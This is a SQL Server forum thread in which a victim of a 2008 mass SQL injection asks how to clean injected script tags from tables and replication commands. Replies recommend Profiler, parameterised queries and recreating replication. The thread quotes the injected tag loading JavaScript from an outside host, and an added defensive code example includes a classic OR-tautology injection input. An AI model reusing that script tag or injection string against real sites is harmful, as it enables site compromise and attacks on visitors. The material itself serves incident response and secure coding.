July 2, 2008 at 5:03 am
Please help me!
I'm under injection attack and I don't know what I can do.
This script '<script src=http://www.hdadwcd.com/b.js></script>' is injected into my database (SQL Server 2000).
It was not only injected into many database fields but also renamed my publication name to:
"publication name <script src=http://www.hdadwcd.com/b.js></script>"
How can I repair it and stop this injection?
How can I edit binary fields in MSrepl_commands and delete this script from command field.
July 2, 2008 at 6:01 am
You need to find the application that is vulnerable to injection (you can use Profiler to see the commands coming to the database).
There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly access the tables but to use stored procs.
I would suggest that you drop the publication in question and recreate it.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
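As an added illustration of the "parameterised rather than built up" advice in the reply above (example code, not from the thread or from SQLServerCentral), the block below contrasts a concatenated query with a parameterised one and then scans every text column for the injected script fragment the original poster describes. SQLite stands in for SQL Server 2000 here; on SQL Server the column list would come from INFORMATION_SCHEMA.COLUMNS instead of PRAGMA table_info, and the table name, column names and sample rows are constructed for the demo.

```python
import sqlite3

# Constructed sample of the kind of fragment the thread describes landing in varchar columns.
INJECTED = "<script src=http://www.hdadwcd.com/b.js></script>"


def setup():
    """Build an in-memory database with one clean row and one tainted row (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, descr TEXT)")
    conn.executemany(
        "INSERT INTO products(name, descr) VALUES (?, ?)",
        [("widget", "plain text"), ("gadget", "plain text" + INJECTED)],
    )
    return conn


def search_concat(conn, term):
    """Vulnerable pattern: user input is spliced into the statement text, so quotes in
    the input change the query's structure (the 'built up' statements the reply warns about)."""
    sql = "SELECT id FROM products WHERE name = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_param(conn, term):
    """Hardened pattern: the statement text is fixed and the input travels as a bound
    parameter, so it is compared as a value and can never alter the query."""
    return [row[0] for row in conn.execute("SELECT id FROM products WHERE name = ?", (term,))]


def find_tainted(conn, marker="<script"):
    """Locate every (table, column, rowid) whose text column contains the marker.
    Table and column names come from the catalog, not from users, and are quoted as
    identifiers because identifiers cannot be bound as parameters."""
    hits = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        text_cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")') if r[2].upper() == "TEXT"]
        for col in text_cols:
            rows = conn.execute(f'SELECT rowid FROM "{table}" WHERE "{col}" LIKE ?', ("%" + marker + "%",))
            hits.extend((table, col, r[0]) for r in rows)
    return hits


if __name__ == "__main__":
    db = setup()
    print("concat, plain input:  ", search_concat(db, "widget"))
    print("concat, quoted input: ", search_concat(db, "widget' OR 'a'='a"))
    print("param,  quoted input: ", search_param(db, "widget' OR 'a'='a"))
    print("tainted cells:        ", find_tainted(db))
```

Running the scan across a restored copy of the database is also a cheap way to confirm that a cleanup or restore actually removed every copy of the fragment before replication is recreated.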
July 3, 2008 at 3:59 pm
When reading this, scroll up to the top of this page in the upper frame; you will see Search: type in the word "injection" (without the quotes) and then click the button labelled Go. And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQLServerCentral.
July 24, 2008 at 3:29 am
Hi
Thank you for your last reply.
I resolved that problem by editing all tables and removing that script.
I think it was a new injection method.
This link was helpful:
http://www.msblog.org/index.php?s=yp
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
But I couldn't resolve a part of the problem:
There were many binary fields in MSrepl_commands containing the bad script.
I deleted them because I couldn't edit them.
I would be pleased to be taught "how to edit the MSrepl_commands command field and alter its data?"
Yours truly
saeed.
July 24, 2008 at 3:31 am
The safest fix is probably to completely drop the replication and recreate it.
Gail Shaw
October 26, 2012 at 9:26 am
Wow, this is an old thread but still very pertinent.
We are rapidly migrating to SQL 2005.
But we were attacked by injection ... every varchar field in every table replaced with similar .js crap. We restored and the world was good.
But we're trying to find the vulnerability ... of the publicly visible pages on the site (only 5 or 6), all are derived with stored procs and/or our own in-house brewed trap.
We are told that SQL2005 and SQL2008 handle SQL injections far better.
We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right?
I'm babbling ... but beyond stored procs and home-grown filters, are there any other known hardware/software remedies?
You refer to a profiler to see commands ... where is that?
October 26, 2012 at 9:32 am
Can you post this in a new thread please?
Gail Shaw
October 26, 2012 at 9:38 am
Sorry .. by all means .. I'm new here ... my bad.
A new thread or somewhere you'd prefer?
Robert
October 26, 2012 at 9:43 am
New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.
Gail Shaw
October 26, 2012 at 9:48 am
OK, will do BUT ... the main gist of this post was your mention of the "profiler"?
We are trying to determine the vulnerability?